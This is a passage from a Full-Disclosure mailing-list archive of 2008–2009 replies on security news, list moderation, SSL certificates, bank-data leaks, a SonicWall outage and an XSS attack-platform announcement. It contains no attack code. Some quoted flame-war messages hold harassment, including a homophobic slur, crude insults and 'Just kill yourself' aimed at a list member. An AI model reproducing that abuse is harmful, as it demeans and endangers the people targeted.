 obvious, my opinions are my own
 and not those of my employer.
 **
 WARNING: Check the headers before replying





-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] to those who want moderation...

2009-01-06 Thread James Matthews
Full Disclosure is like free speech. We cannot have moderation if we want to
have freedom on the list. That's life.

On Mon, Jan 5, 2009 at 9:45 PM, Warren Myers volcimas...@gmail.com wrote:

 eschew moderation!

 just delete crap you don't want :)

 WMM

 On Mon, Jan 5, 2009 at 2:26 PM, Michael Krymson krym...@gmail.com wrote:
 
  For those that want moderation on this mailing list, please let us all
  know how you would like to achieve said moderation on a mailing list
  populated by security-conscious persons who may also share a tendency to
  eschew rules and/or authority.
 
  Before vomiting out an answer, think a little bit more about it and
  continue down that road.
 
  Finally, when you come upon enlightenment, shut up and stop crying about
  moderation.



 --

 Warren Myers
 http://warrenmyers.com





-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] Muslim Hackers Declare CyberWar on Israel

2009-01-06 Thread James Matthews
Interestingly enough they hacked into the DNS servers and just redirected
the sites to another server as opposed to defacing them.

On Tue, Jan 6, 2009 at 6:09 AM, Ureleet urel...@gmail.com wrote:

 drivel

 On Fri, Jan 2, 2009 at 5:46 PM, n3td3v xploita...@gmail.com wrote:
 
 http://garwarner.blogspot.com/2008/12/muslim-hackers-declare-cyberwar-on.html
 
 





-- 
http://www.astorandblack.com/

Re: [Full-disclosure] A tool to identify the MD5 certs on FF

2009-01-06 Thread James Matthews
This is a very nice tool. Thanks I am going to test it out now.

On Tue, Jan 6, 2009 at 8:47 PM, Mark Sec mark@gmail.com wrote:

 MMM Efrain Torres a new module for identify CA with metasploit.

 -mark


 2009/1/2 Aiko Barz a...@deepco.de

 On Thu, Jan 01, 2009 at 06:19:01PM -0500, Memisyazici, Aras wrote:
  SSL Blacklist now detects and warns about certificate chains that use
 the MD5 algorithm for RSA signatures.

 Does anybody know a plugin that keeps track of the used certificates and
 CAs? I tried certificate patrol [1]. But I wasn't too happy...

 I would like to get warnings, whenever a fingerprint changes. For
 example:

 INFO:The certificate fingerprint has changed.
 The new certificate is signed by the same CA.
 Details...

 WARNING: The certificate fingerprint has changed.
 The new certificate is signed by a different CA.
 A possible MITM attack has been detected.
 Details...

 So long,
Aiko

 [1]: https://addons.mozilla.org/en-US/firefox/addon/6415
 --
 :wq ✉









-- 
http://www.astorandblack.com

Re: [Full-disclosure] FD / lists.grok.org - bad SSL cert

2009-01-05 Thread James Matthews
SSL certs cost money. This one works the same. etc..

On Mon, Jan 5, 2009 at 2:35 PM, Gary Wilson dra...@dragons.org.uk wrote:


 Having had enough of the non-topic junk this list has become recently, I
 went to unsub, but it seems the SSL cert is not valid/trusted.

 For the mods, I guess:

 Secure Connection Failed

 lists.grok.org.uk uses an invalid security certificate.

 The certificate is not trusted because the issuer certificate is not
 trusted.

 (Error code: sec_error_untrusted_issuer)


* This could be a problem with the server's configuration, or it could
 be someone trying to impersonate the server.

* If you have connected to this server successfully in the past, the
 error may be temporary, and you can try again later.

 --
 GW





-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] The war in Palestine

2009-01-03 Thread James Matthews
Yes however we hope that the killing stops on both sides.

On Sat, Jan 3, 2009 at 4:18 AM, Paul Schmehl pschmehl_li...@tx.rr.com wrote:

 --On January 2, 2009 4:27:10 PM -0600 Handrix hand...@gmail.com wrote:

 
  Hi all,
 
  The terrorist Israeli forces bombed Gaza city and destroyed many
  buildings and killed several hundred people.
  Israel likes to invoke as a justification for its attacks on its
  neighbors the war against Terror - the current slogan adopted by the
  United States.
  I hope that can help many people to understand why killing children,
  women, and all innocents person.
 
  Please STOP WAR IN PALESTINE

 Hamas has sent over 6000 rockets into Israel over the past three years.
 In 2008 alone they launched 1,750 rockets and 1,528 mortar shells into
 Israeli territory.  They're about as innocent as a thief caught with his
 hand in the cookie jar.  Not only that but they deliberately place their
 rocket and mortar launchers in the middle of civilian targets in an effort
 to produce as many Palestinian casualties as possible purely for
 propaganda purposes.  They alone are responsible for the deaths of
 innocent Palestinians.

 The Palestinians overwhelmingly voted Hamas into power and fully support
 their repeated murder of Israelis.  They support the complete annihilation
 of Israel and all its people.  What do you expect Israel to do?  Negotiate
 with bloodthirsty murderers?

 Paul Schmehl, If it isn't already
 obvious, my opinions are my own
 and not those of my employer.
 **
 WARNING: Check the headers before replying





-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] Penetration testing will be dead by 2009 - Mr. Chess

2008-12-31 Thread James Matthews
I wish! Fortify software has been tested against many open source projects
and reported a bunch of false positives. Yes, I know they are working to
improve the software. However, I still hold that fuzzing will show you
some issues that this software cannot.

James

On Tue, Dec 30, 2008 at 8:16 PM, Simon Smith si...@snosoft.com wrote:



 http://snosoft.blogspot.com/2008/12/brian-chess-cto-of-fortify-software.html


Simon Smith
si...@snosoft.com
 --

Subscribe to our blog
 http://snosoft.blogspot.com








-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] Merry Christmas

2008-12-28 Thread James Matthews
Merry Christmas and happy new year

On Sun, Dec 28, 2008 at 11:52 PM, Jared DeMott
jdem...@crucialsecurity.com wrote:

 KammyDoe wrote:
  Merry Christmas, FD!
  It's been a fun year; here's to '09!
 
 
 And may God bless you! :)





-- 
http://www.astorandblack.com/

Re: [Full-disclosure] This list has run its course

2008-12-23 Thread James Matthews
My spam folder is very happy! I wonder what the list will become now...

On Tue, Dec 23, 2008 at 11:34 AM, James Rankin kz2...@googlemail.com wrote:

 Well just f*ck off then and cease babbling about it. Please, make my Spam
 folder happy.

 2008/12/23 n3td3v xploita...@gmail.com

 This mailing list is no longer credible for serious researchers to be
 on. I'll be elsewhere, just not HERE.

 On Tue, Dec 23, 2008 at 6:07 AM, Biz Marqee biz.mar...@gmail.com wrote:
  you're obviously a lying cunt or you would have ceased posting to this
 list
  already.
 
 
  On Tue, Dec 23, 2008 at 4:15 PM, n3td3v xploita...@gmail.com wrote:
 
  n3td3v continues on the internet elsewhere just not HERE.
 
  On Tue, Dec 23, 2008 at 4:37 AM, Biz Marqee biz.mar...@gmail.com
 wrote:
   Good job faggot, its only been 3 years coming.
  
   I believe it was Immortal Technique who said it best, Just kill
   yourself!
  
  
  
   On Tue, Dec 23, 2008 at 9:53 AM, n3td3v xploita...@gmail.com
 wrote:
  
   Real researchers who should be taken seriously aren't taken
 seriously
   anymore.
  
   I'm leaving full-disclosure because of the abuse.
  
   It's just turned into flames to spin people up, I don't get a chance
   to talk about security or my skill set.
  
   It's abuse after abuse after abuse.
  
   Sorry, I can't take it anymore.
  
   Got to go, bye.
  
  
  
 
 








-- 
http://www.astorandblack.com/

Re: [Full-disclosure] STAR - A frontend to RATS

2008-12-23 Thread James Matthews
Looks good, I am going to check it out soon against some PHP code. I love
writing in Python and will try to contribute to the code.

On Tue, Dec 23, 2008 at 5:35 PM, Ben comsat...@earthlink.net wrote:

 All,

 While bored at work this past week I decided to throw together a front end
 for the Rough Auditing Tool for Security (RATS).  It supports most features
 of RATS and runs on both win32 and nix systems.  Development was in Python
 (PyQt4) and the app has been packaged using py2exe.  See
 http://www.socialnetworkwhore.com/ for screen shots and downloads.

 Any cool feature ideas would be appreciated :)

 Have a great day,
 Ben

 P.S. Source code coming soon :)





-- 
http://www.astorandblack.com/

Re: [Full-disclosure] Urgent Google Contact

2008-12-18 Thread James Matthews
There is also http://www.justfuckinggoogleit.com/

On Fri, Dec 19, 2008 at 12:16 AM, Aaron Turner synfina...@gmail.com wrote:

 On Thu, Dec 18, 2008 at 1:46 PM, xyberpix xyber...@xyberpix.com wrote:
  Hi all,
 
  Does anyone have contact details for anyone at Google's security
  department at all?

 Here you go:

 http://www.letmegooglethatforyou.com/?q=google+security+contact



 --
 Aaron Turner
 http://synfin.net/
 http://tcpreplay.synfin.net/ - Pcap editing and replay tools for Unix & Windows
 They that can give up essential liberty to obtain a little temporary
 safety deserve neither liberty nor safety.  -- Benjamin Franklin





-- 
http://www.astorandblack.com

Re: [Full-disclosure] List of security teams contact information

2008-12-17 Thread James Matthews
Well it's a Wiki so we can all contribute.


On Wed, Dec 17, 2008 at 5:27 PM, security curmudgeon
jeri...@attrition.org wrote:


 : I've created a list with contact information for various security teams:
 :
 :
 http://skypher.com/wiki/index.php?title=List_of_security_teams_contact_information
 : I hope this makes informing vendors about security issues easier. If you
 : have any additional information or spot an error, let me know.

 http://osvdb.org/vendors

 This project was created a while back to do the same. Please consider
 contributing to it.





-- 
http://www.astorandblack.com/

Re: [Full-disclosure] request for comments...

2008-12-17 Thread James Matthews
Wow now there is a twitter also!

On Wed, Dec 17, 2008 at 2:31 PM, j-f sentier j.sent...@gmail.com wrote:

 N3td3v, the FD voice.

 2008/12/17 n3td3v xploita...@gmail.com

 On Tue, Dec 16, 2008 at 6:53 PM, Ureleet urel...@gmail.com wrote:
  On Tue, Dec 16, 2008 at 11:59 AM, n3td3v xploita...@gmail.com wrote:
  On Tue, Dec 16, 2008 at 4:16 PM, jose achada achada.j...@gmail.com
 wrote:
  no physical barriers are imposed and nor the big media can hide you.
 
  The intelligence services have been in control of the big media and
  have been for some time.
 
  ill agree there.
 
 
  When I started full-disclosure I was innocent and pure, then I met
  various people and realised how the world really works.
 
  u didnt start fulldisclosure, u mean 2 say, when u started ON fd.  but
  according 2 ur posts be4 fd existed that i have googled, thats a lie.
 
 
  I met them on-line and in person, they wanted a slice of n3td3v, they
  wanted to control the path n3td3v takes...
 
  I told them I won't allow you to do that, but you can be with me and
  we can progress together...
 
  I still get emails from the intelligence services trying to give me
  advice on the path of n3td3v, but I reject all advice.
 
  obviusly
 
  I know that the government can impose big guys to come after me to
  force me to 'go with their agenda, not mine' but im not at that stage
  yet.
 
  The n3td3v group is still free from government influence, apart from
  the 'big media' who control us all.
 
  I fear this won't last forever, there are people trying to control
  what n3td3v is doing behind the scenes, because its become a big
  powerful name in the 'cyber security' arena.
 
  u have dilusious of grandeur.  u rnt a big powerful name.  u rnt a
  group.  u r just u.  nd no 1 knows u.
 
 
  I will as long as I can make n3td3v be free and independent from the
  intelligence services, but if they offer me a job how will I stop
  myself being influenced by their agenda?
 
  this is why.  n3td3v = andrew wallace.
 

 Thanks for your feedback on what you think, not that I or anyone or
 this list care what you think.

 -Andrew

 http://twitter.com/n3td3v









-- 
http://www.astorandblack.com

Re: [Full-disclosure] new unpatched security flaw found Firefox 3.0.4

2008-12-17 Thread James Matthews
Maybe one day it will be exploited as a bug.

On Wed, Dec 17, 2008 at 12:28 PM, Andrew Farmer andf...@gmail.com wrote:

 On 16 Dec 08, at 11:49, carl hardwick wrote:
  New unpatched security flaw found in Firefox 3.0.4
  PoC here: https://bugzilla.mozilla.org/attachment.cgi?id=302699

 Relevant bug is https://bugzilla.mozilla.org/show_bug.cgi?id=416907

 This doesn't appear to be security-critical - it's a NULL dereference.





-- 
http://www.astorandblack.com

[Full-disclosure] Two windows exploits in the wild

2008-12-11 Thread James Matthews
One IE exploit and One Wordpad

http://it.slashdot.org/it/08/12/10/206216.shtml

On a more interesting note, I feel that Slashdot should screen their writers
better. Here is a quote that I saw: *'The exploit is a typical heap overflow
that appears to be exploiting something in the XML parser.'* Try to have
someone that knows what a heap overflow is look over the article next time. If
it's a heap overflow we know it's exploiting a heap within the program.
-- 
http://www.astorandblack.com/

Re: [Full-disclosure] FD subject line/name of org suggestion...

2008-12-11 Thread James Matthews
This is quite simple to do on Gmail. All you need to do is open any
full-disclosure email. Then click on show details and select filter messages
from this mailing list.

On Thu, Dec 11, 2008 at 6:10 PM, [EMAIL PROTECTED] wrote:

 On Thu, 11 Dec 2008 10:39:51 EST, Phillip Partipilo said:
  Could try a separate folder and using rules to segregate FD emails.
  There really arent *that* many emails, I mean, compared to nearly
  insane volume of ntsysadmin or activedir.

 Are they worse than linux-kernel, which is averaging some 500+ messages
 a day?

 Note that nobody reads every post in linux-kernel. In fact, nobody who
 expects to have time left over to actually do any real kernel work will
 read even half. Except Alan Cox, but he's actually not human, but about a
 thousand gnomes working in under-ground caves in Swansea. None of the
 individual gnomes read all the postings either, they just work together
 really well. -- Linus Torvalds (2000-05-02)






-- 
http://www.astorandblack.com/

Re: [Full-disclosure] Jobless techies turning to crime

2008-12-11 Thread James Matthews
These people have skills that can be used for good or bad. Everyone has to
eat, and I feel that these people should look into starting a new company or
creating a website and blogging about their former workplace.

On Fri, Dec 12, 2008 at 2:00 AM, Ivan . ivan...@gmail.com wrote:

 Both PricewaterhouseCoopers (PwC) and security vendor Finjan are
 forecasting that the recession will fuel a significant rise in insider
 fraud and cyber crime in 2009.

 http://www.silicon.com/financialservices/0,3800010322,39363838,00.htm





-- 
http://www.astoandblack.com/

Re: [Full-disclosure] 21 Million German bank accounts stolen

2008-12-10 Thread James Matthews
Also, money transfers are traceable. I am guessing that they also have EC
card data.

On Wed, Dec 10, 2008 at 2:06 PM, Jost Krieger [EMAIL PROTECTED][EMAIL PROTECTED] wrote:

 On Tue, Dec 09, 2008 at 04:11:48PM +0200, James Matthews wrote:
  German banks are some of the oldest in the world. This is pretty scary
  however it is also the reality of Germany's new laws... I hope they find
  it soon and protect the people that need to be protected
  http://it.slashdot.org/it/08/12/09/0125201.shtml

 What Slashdot doesn't say:

 What was disclosed were 1.2 million account numbers plus additional
 information, but not means of access. This is bad enough of course.

 The 21 million were claimed to be available by the perps, which is
 believable, as they tried to sell them to a newspaper.

 The trail seems to lead to small call centers, where someone collects
 these data and sells them on the side. The banks seem not to be
 involved at all.

 If you find this all weird, payments in Germany work totally different
 from the US. No one uses checks for private payments, either you use
 money transfer or you have the money directly pulled from your account
 (and you can call it back for at least 6 weeks). So a lot of people know
 your account number.

 Jost
 --
 | Help eradicate spam!  HTML in mail is impolite. |
 | Postmaster, JAPH, sometimes fortune-teller at the computing center of RUB |
 | True words are not pleasing, pleasing words are not true. |
 |  Lao Tse, Tao Te King 81 |





-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

[Full-disclosure] 21 Million German bank accounts stolen

2008-12-09 Thread James Matthews
German banks are some of the oldest in the world. This is pretty scary;
however, it is also the reality of Germany's new laws... I hope they find it
soon and protect the people that need to be protected.
http://it.slashdot.org/it/08/12/09/0125201.shtml

-- 
http://www.astorandblack.com/

Re: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says

2008-12-09 Thread James Matthews
And money is used to bail out banks and other massive companies!

On Tue, Dec 9, 2008 at 4:01 PM, Ureleet [EMAIL PROTECTED] wrote:

 time is money.

 On Mon, Dec 8, 2008 at 11:28 PM, Rafal @ IsHackingYou.com
 [EMAIL PROTECTED] wrote:
  Ivan, all,
 
  Hold the phone...$5k-$7k to fix an infected device!?  Really?  HOLY
  CRAP... either that's a completely made-up FUD figure, or the government
  contractors are making *way* too much money off my taxes.
 
  __
  Rafal M. Los
  IT Security - Response | Mitigation | Strategy
 
  E-mail:  [EMAIL PROTECTED]
   - Blog: http://preachsecurity.blogspot.com
 
  --
  From: Ivan . [EMAIL PROTECTED]
  Sent: Monday, December 08, 2008 5:14 PM
  To: Full-Disclosure mailing list full-disclosure@lists.grok.org.uk
  Subject: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says
 
 
 http://www.businessweek.com/bwdaily/dnflash/content/dec2008/db2008127_817606.htm
 




-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] 21 Million German bank accounts stolen

2008-12-09 Thread James Matthews
Contact your bank and ask them how they protect you against fraud. Get
everything in writing. Then, to be safe, change everything (hoping that these
people don't have continual access to the bank's server so they pick up new
accounts). Place a credit watch on your SCHUFA score and hope that the BND
catches them.

On Tue, Dec 9, 2008 at 11:57 PM, Some Guy Posting To Full Disclosure 
[EMAIL PROTECTED] wrote:

 To you or someone who knows anything about banks, fraud, and how they
 work and things.

 I have a German bank account.

 Should I do something!?

 On 12/9/08, James Matthews [EMAIL PROTECTED] wrote:
  German banks are some of the oldest in the world. This is pretty scary
  however it is also the reality of Germany's new laws... I hope they find
  it soon and protect the people that need to be protected
  http://it.slashdot.org/it/08/12/09/0125201.shtml
 
  --
  http://www.astorandblack.com/
 


 --
 I'm your best best friend.




-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] Fwd: We're letting the bad guys win

2008-12-08 Thread James Matthews
One thing I love about all these flame wars is the choice of words. The
flames are great, but I think they have flame lists for that. So please try
to keep it to a minimum.

On Mon, Dec 8, 2008 at 3:34 PM, Ureleet [EMAIL PROTECTED] wrote:

 plez stop picking on me guyz!

 btw -- i didnt create the bandwagon.  i can find ppl flaming you since
 like 96, when u were prepubescent and jacking off to ascii printout
 porn.  (comeon u fuckers u know u did it 2)  youve said some
 outlandish bullshit comments over the years, and now we are calling u
 out 4 them.  i suggest u rethink ur strategy.

 On Sun, Dec 7, 2008 at 10:08 PM, j-f sentier [EMAIL PROTECTED] wrote:
 
  LMAO
 
  2008/12/7 n3td3v [EMAIL PROTECTED]
 
  I think we're all as bad as each other, c'mon guys we shouldn't be
  fighting like this in the infosec community, the hackers will be
  laughing at us fighting with each other when we should be thinking up
  new ways to beat the bad guys. One day maybe we can all meet up for a
  beer and be good buddies, there is no need for this type of fighting
  in infosec, live and let live. Some kind of bandwagon has been created
  by Ureleet that some infosec members have jumped on, I urge you to
  jump off this bandwagon, we all need to unify as a community and come
  up with solutions to tackle big things coming up in information
  security, like stopping the bad guys use security software that is
  only intended for penetration testers in the security professional
  community.
 




-- 
http://www.astorandblack.com/

[Full-disclosure] NY Time on Bots

2008-12-08 Thread James Matthews
Nice to know that we are losing the war. This was written after some botnets
almost died.

http://www.nytimes.com/2008/12/06/technology/internet/06security.html?_r=2

-- 
http://www.astorandblack.com/

Re: [Full-disclosure] Solaris 10 Auditing

2008-12-08 Thread James Matthews
I found that Solaris is too much like old Unix and I got spoilt by Linux
already. Good luck.

On Mon, Dec 8, 2008 at 7:24 PM, Michael Holstein 
[EMAIL PROTECTED] wrote:


  I am looking for a free audit script / tool to audit host level
  security for Solaris 10 machines. Does any one know of any such
  scripts / tools around?
 

 http://www.cisecurity.org/benchmarks.html


 Cheers,

 Michael Holstein CISSP GCIA
 Cleveland State University





-- 
http://www.astorandblack.com/

Re: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says

2008-12-08 Thread James Matthews
They are trying to get the government to do something about it. But unless
they see the danger, not just hear about it, nothing will happen.

Consider remarks before Congress last year by O. Sami Saydjari, CEO of Cyber
Defense Agency http://www.cyberdefenseagency.com/, a security research and
consulting firm, and a former official at the Defense Dept.'s research arm,
DARPA. Following a major cyber-attack, he told legislators, electricity,
banking, and communications could all go dead, leaving Americans scrounging
for food, water, gasoline—even hunks of firewood traded on the black market.


On Tue, Dec 9, 2008 at 6:39 AM, Elazar Broad [EMAIL PROTECTED] wrote:


 They ain't called beltway bandits for nothing...

 On Mon, 08 Dec 2008 23:28:52 -0500 Rafal @ IsHackingYou.com
 [EMAIL PROTECTED] wrote:
 Ivan, all,
 
 Hold the phone...$5k-$7k to fix an infected device!?  Really?  HOLY
 CRAP... either that's a completely made-up FUD figure, or the government
 contractors are making *way* too much money off my taxes.
 
 __
 Rafal M. Los
 IT Security - Response | Mitigation | Strategy
 
 E-mail:  [EMAIL PROTECTED]
  - Blog: http://preachsecurity.blogspot.com
 
 --
 From: Ivan . [EMAIL PROTECTED]
 Sent: Monday, December 08, 2008 5:14 PM
 To: Full-Disclosure mailing list full-
 [EMAIL PROTECTED]
 Subject: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says
 
 
 http://www.businessweek.com/bwdaily/dnflash/content/dec2008/db2008127_817606.htm
 




-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] FD culture!?

2008-12-06 Thread James Matthews
There are many moderated security lists. Spam annoys us all but here it's
allowed.

On Sat, Dec 6, 2008 at 7:15 PM, The Security Community 
[EMAIL PROTECTED] wrote:

 On Sat, Dec 6, 2008 at 1:00 AM, Bipin Gautam [EMAIL PROTECTED]
 wrote:
  Guys,
 
  This mailing list lives up to its name Full Disclosure for
  tolerating the monkeys and their chattering in this list for quite
  some time now without moderation or any action! This mailing list had
  a culture, the audience base and that was the only reason we all
  subscribed to it!
 

 God only knows there's damned little disclosure going on, full or
 otherwise.





-- 
http://www.goldwatches.com/

http://www.astorandblack.com/

Re: [Full-disclosure] News for Ureleet

2008-12-04 Thread James Matthews
A nice compromise, I wonder if it will work.

On Thu, Dec 4, 2008 at 5:23 AM, ghost [EMAIL PROTECTED] wrote:

 Hey mike, how about you stop playing moderator you fucking douche bag.
 I for one believe netdev brings a lot to this list and encourage him
 and ureleet to continue posting.

 On Wed, Dec 3, 2008 at 9:47 PM, Mike C [EMAIL PROTECTED] wrote:
  Hey Guys,
 
  I thought we had settled the issues offline. Lets restart our
  discussions.. this bickering is highly unnecessary on the list.
 
  --
  MC
  Security Researcher
  Lead, Project Chroma
  http://sites.google.com/site/projectchromaproject/
 




-- 
http://www.astorandblack.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] Sonicwall license servers down .. all customers affected

2008-12-02 Thread James Matthews
I am sure SonicWall is going to lose many customers, and other companies
should learn and not put DRM in their products. I hope this will teach them.

On Tue, Dec 2, 2008 at 9:36 PM, Elazar Broad [EMAIL PROTECTED] wrote:


 I stopped using SonicWall when I learned I had to purchase a whole
 new device for a customer that just wanted to add a few more
 machines to their network, instead of bumping the license like most
 normal vendors.

 On Tue, 02 Dec 2008 14:14:43 -0500 IT Security
 [EMAIL PROTECTED] wrote:
 Sonicwall (makers of various security products) has had their license
 manager (server) go haywire overnight and it's reset (meaning invalidated)
 the licenses on all of their email security products. This means customers
 can't login to their own systems (a good case against draconian DRM like
 this). Calls to support have gone straight to voicemail all morning, and no
 ETA for resolution yet exists.
 
 This is affecting **all** of their customers, as far as I can tell (and
 based on what I'm told by their general support ticket-taker).
 
 Their forum (probably requires registration) is full of complaints about it.
 Screenshots of it and other problem areas are available on request .. but I
 don't want to email them to this entire list).
 
 The first alert was these warnings :
 
 
 ~~ SonicWALL Email Security Alert (6.2.2.1071) ~~
 
 
 [Summary: Your Email Security licenses have been reset.]
 
 Details:
 Host Name: **ourmailhost**
 Description: The Email Security licenses have been reset at
 12/02/2008 04:18 EST. The email filtering will not be
 working.
 
 TimeStamp:
 LocalTime: Tue Dec 2 04:18:49 2008
 GMT: Tue Dec 2 09:18:49 2008
 
 Additional Information:
 Recommended Action: Please contact SonicWall Technical
 Support.
 
 A response from their technical support on the issue went like this :
 
 The issue is on our backend server who stores the registrations, some ES
 appliances got licences resetted. The exact cause is still being analized
 with high priority. In those cases entering the mysonicwall credentials or
 uploading file solve the issue. Kind Regards Ivan
 
 And as of now, their license server is **still** off-line :
 
 $ telnet licensemanager.sonicwall.com 443
 Trying 204.212.170.143...
 telnet: Unable to connect to remote host: Connection refused
 
 DRM schemes like this only cause problems for the LEGITIMATE customers.




-- 
http://www.astorandblack.com/

http://www.jewelerslounge.com/liberty-coin-cufflinks

Re: [Full-disclosure] Project Chroma: A color code for the state ofcyber security

2008-12-01 Thread James Matthews
The color system was made in order to give people a quick look at the terror
scale. So too, this can be something for us to have a quick look at the
exploit scale. Remember these colors are for people in the IT industry and
not for the average person.
James

On Mon, Dec 1, 2008 at 10:52 PM, n3td3v [EMAIL PROTECTED] wrote:

 Maybe he thinks the same as you and is making fun of the Department of
 Homeland Security, SANS Internet Storm Center etc.

 On Mon, Dec 1, 2008 at 4:27 PM, rholgstad [EMAIL PROTECTED] wrote:
  and how does making a color based on these inputs protect people?
 
  Mike C wrote:
  On Mon, Dec 1, 2008 at 4:21 AM, vulcanius [EMAIL PROTECTED] wrote:
 
  By the way, I also noticed that the new site for your project has the
  current threat level as yellow. Is it safe to assume that you've already
  got your metric systems in place and running?
 
 
 
  Yes,
 
  We do have a working framework for color code generation. The inputs
  to this function include
 
  * exploits released in the past week
    - The severity of the exploit
    - The application it was in
    - The language
    - estimated users of the software
 
  * The previous week's color
 
  * Localized nature of exploits.
 
  We cannot comment more on this until it is refined and standardized.
  If you are (or know) an antivirus vendor, please contact me offline to
  move ahead.
 
 
 




-- 
http://www.astorandblack.com/

http://www.jewelerslounge.com/movado-watches-on-sale

Re: [Full-disclosure] Indian allegations alarm Pakistan

2008-11-30 Thread James Matthews
India was attacked; the attackers came from Pakistan. I understand why
Pakistan feels threatened; however, why would they attack Indian sites?

On Sun, Nov 30, 2008 at 9:19 AM, Mike C [EMAIL PROTECTED] wrote:

 On Sun, Nov 30, 2008 at 11:11 AM, n3td3v [EMAIL PROTECTED] wrote:
  On Sun, Nov 30, 2008 at 5:25 AM, Mike C [EMAIL PROTECTED] wrote:
 
 
  On Sun, Nov 30, 2008 at 7:39 AM, Raj Mathur [EMAIL PROTECTED] wrote:
 
  On Sunday 30 Nov 2008, n3td3v wrote:
   Indian-Pakistan war is about to kick off folks...
  
   http://news.bbc.co.uk/1/hi/world/south_asia/7757031.stm
 
  I know it's not going to happen, but can I request you once again shut
  the fuck up about events that you have no clue about?
 
  At least try to keep your sensationalist retarded drivel to your own
  backyard.
 
 
  Although a knee-jerk reaction, this post has some value.
 
  The tensions between the countries is on the rise, and the recent blasts
  in Bangalore would increase the chances of war. BTW, does anyone have an
  idea on what kind of cyber-warfare is currently underway between the two
  nations?
 
  --
  MC
 
  There was a report earlier in the week via pcworld.com, but I don't
  think its connected to this conflict, maybe just a coincidence:
 
 
 http://www.pcworld.com/businesscenter/article/154544/feuding_india_pakistani_hackers_deface_web_sites.html
 

 Thanks. I'm looking into this and will report on any further info.

 --
 MC





-- 
http://www.astorandblack.com/

http://www.jewelerslounge.com/liberty-coin-cufflinks

Re: [Full-disclosure] Anehta0.6.0 -- a new XSS Attack Platform!

2008-11-26 Thread James Matthews
I applaud the new tool; however, in reference to what Mike said, take a page
out of HD Moore's book and make it something to help the community.

On Wed, Nov 26, 2008 at 7:47 PM, Mike C [EMAIL PROTECTED] wrote:



 2008/11/25 pst axis [EMAIL PROTECTED]

  Anehta is an open source XSS Attack Platform which is maintained by
 [EMAIL PROTECTED]



 Project Home: http://anehta.googlecode.com

 Demo Video:
 http://hi.baidu.com/aullik5/blog/item/cb4cd5899283b093a4c272a9.html

 Online Demo: http://www.secwiki.com/anehta

 Download: http://anehta.googlecode.com/files/anehta-v0.6.0fixed.zip



 It contains a javascript framework called anehta.js which is something
 like attackAPI to help hackers write XSS payloads easier, and more than
 that, there is an administrative panel which is implemented in PHP to help
 manage the clients.



 Many good ideas are included in anehta project, some of the ideas you
 might never have seen before.

 You can really maximize your profits gained from XSS by launching anehta.

 I'm not sure you should word it that way. While full-disclosure is the best
 way to security utopia, touting a tool for its malicious use will only
 serve to provide fodder to those who are opposed to full-disclosure.

 HD Moore has handled this well with his framework.

 --
 MC





-- 

http://www.goldwatches.com/

http://www.jewelerslounge.com/liberty-coin-cufflinks

http://www.astorandblack.com/

Re: [Full-disclosure] Microsoft takes 7 years to 'solve' a problem?!

2008-11-25 Thread James Matthews
I think in that effect they didn't feel they had to put the resources in to
fix it because it wasn't worth the money.

On Tue, Nov 25, 2008 at 11:11 AM, [EMAIL PROTECTED] wrote:

 On Tue, 25 Nov 2008 03:07:49 EST, Randal T. Rioux said:
  On Tue, November 25, 2008 1:44 am, Memisyazici, Aras wrote:
  SSNNIIPP
   OK... Maybe I'm going a bit extreme, but WTH?! Am I the only one who is
   interpreting this, this way? Really? When has releasing a solution to a
   problem 7 years later ever been acceptable?
 
  May not be acceptable, but it is standard practice with some software
  companies.

 That, plus Russ didn't even bother to read the fine article:

 And to be clear, the impact would have been to render many (or nearly all)
 customers' network-based applications then inoperable. For instance, an
 Outlook 2000 client wouldn't have been able to communicate with an Exchange
 2000 server.

 I know the users Russ supports - we'd have needed a body bag for him if
 he had chosen that route rather than not cause a significant impact.

 This wasn't a buffer overflow, the problem was that the NTLM protocol was
 screwed up by design - and fixing a protocol bug is usually a *lot* more
 painful.  If you read between the lines of the article, it appears that MS
 added support for a fixed protocol back in XP SP2, and has decided that the
 number of pre-SP2 systems out there talking to updated systems has grown
 small enough that it's finally practical to flip the switch.  That's pretty
 much the only way to change a protocol without a flag-day cutover - ship
 dual-stack during a transition, and then flip the switch when few enough
 old-style machines are left.

 Let's face it - the number of systems that have gotten compromised via
 SMBRelay attacks is *far* smaller than the number of boxes pwned just
 because they have IE installed and a user at the keyboard. The number of
 systems pwned via SMBRelay is *also* a lot smaller than the number of
 boxes that would have broken if Microsoft had fixed things the way Russ
 apparently wanted them to.





-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/luxury-watch-safe

Re: [Full-disclosure] Fwd: Comment on: 2 engineers from China sentenced for espionage

2008-11-25 Thread James Matthews
I love FD! Where we get a full disclosure on the latest flame war :)

On Tue, Nov 25, 2008 at 11:10 PM, n3td3v [EMAIL PROTECTED] wrote:

 Mike C

 On Mon, Nov 24, 2008 at 9:40 PM, Ureleet [EMAIL PROTECTED] wrote:
  name 1?
 
  On Mon, Nov 24, 2008 at 10:01 AM, n3td3v [EMAIL PROTECTED] wrote:
  On Mon, Nov 24, 2008 at 7:50 AM, Mike C [EMAIL PROTECTED] wrote:
  For what it's worth, i think the n3td3v groups feed is a bad idea
  because not many serious researchers have joined that group
 
  there are plenty of serious researchers on the group though they
  appear to be taking advantage of the feed instead of talking.
 
  all the best,
 
  n3td3v
 




-- 
http://www.astorandblack.com/

http://www.jewelerslounge.com/liberty-coin-cufflinks

Re: [Full-disclosure] Microsoft takes 7 years to 'solve' a problem?!

2008-11-25 Thread James Matthews
Only at the end. When there is a 0-day in the wild they will devote a lot of
manpower in order to patch it. However, in this case I don't understand why
